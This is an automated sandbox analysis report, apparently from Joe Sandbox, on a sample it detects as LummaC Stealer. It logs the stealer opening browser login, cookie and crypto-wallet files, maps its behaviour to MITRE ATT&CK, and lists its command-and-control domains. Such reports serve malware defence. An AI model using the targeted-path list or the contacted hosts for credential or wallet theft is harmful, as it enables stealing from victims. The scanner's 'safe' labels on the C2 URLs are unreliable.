              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
              Source: Yara matchFile source: Process Memory Space: yO9EAqDV15.exe PID: 7412, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: yO9EAqDV15.exe PID: 7412, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		44
              Virtualization/Sandbox Evasion              		1
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory851
              Security Software Discovery              		Remote Desktop Protocol21
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager44
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials223
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              yO9EAqDV15.exe58%ReversingLabsWin32.Trojan.Symmi
              yO9EAqDV15.exe50%VirustotalBrowse
              yO9EAqDV15.exe100%AviraTR/Crypt.XPACK.Gen
              yO9EAqDV15.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://observerfry.lat/pi0%Avira URL Cloudsafe
              https://observerfry.lat:443/apiexe0%Avira URL Cloudsafe
              https://observerfry.lat:443/apiy.exe0%Avira URL Cloudsafe
              https://observerfry.lat/apiw0%Avira URL Cloudsafe
              https://observerfry.lat/$0%Avira URL Cloudsafe
              https://observerfry.lat/d0%Avira URL Cloudsafe
              http://crl.microp;0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              observerfry.lat
              		172.67.199.72
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                wordyfindy.latfalse
                  		high
                  slipperyloo.latfalse
                    		high
                    curverpluch.latfalse
                      		high
                      tentabatte.latfalse
                        		high
                        https://observerfry.lat/apifalse
                          		high
                          manyrestro.latfalse
                            		high
                            shapestickyr.latfalse
                              		high
                              talkynicer.latfalse
                                		high
                                bashfulacid.latfalse
                                  		high
                                  observerfry.latfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabyO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://observerfry.lat:443/apiy.exeyO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgyO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoyO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://observerfry.lat/piyO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctayO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://observerfry.lat/yO9EAqDV15.exe, 00000000.00000003.2051214971.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2027251253.0000000005F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ocsp.rootca1.amazontrust.com0:yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17yO9EAqDV15.exe, 00000000.00000003.2006014483.0000000005FB9000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://observerfry.lat/apiwyO9EAqDV15.exe, 00000000.00000003.2126425221.00000000017B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://observerfry.lat:443/apiexeyO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.ecosia.org/newtab/yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://observerfry.lat/$yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://observerfry.lat/dyO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bryO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgyO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiyO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://x1.c.lencr.org/0yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://x1.i.lencr.org/0yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallyO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchyO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://support.microsofyO9EAqDV15.exe, 00000000.00000003.1981644973.0000000005FC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?yO9EAqDV15.exe, 00000000.00000003.2027693585.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesyO9EAqDV15.exe, 00000000.00000003.1981727768.0000000005F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://support.mozilla.org/products/firefoxgro.allyO9EAqDV15.exe, 00000000.00000003.2028984633.000000000608A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
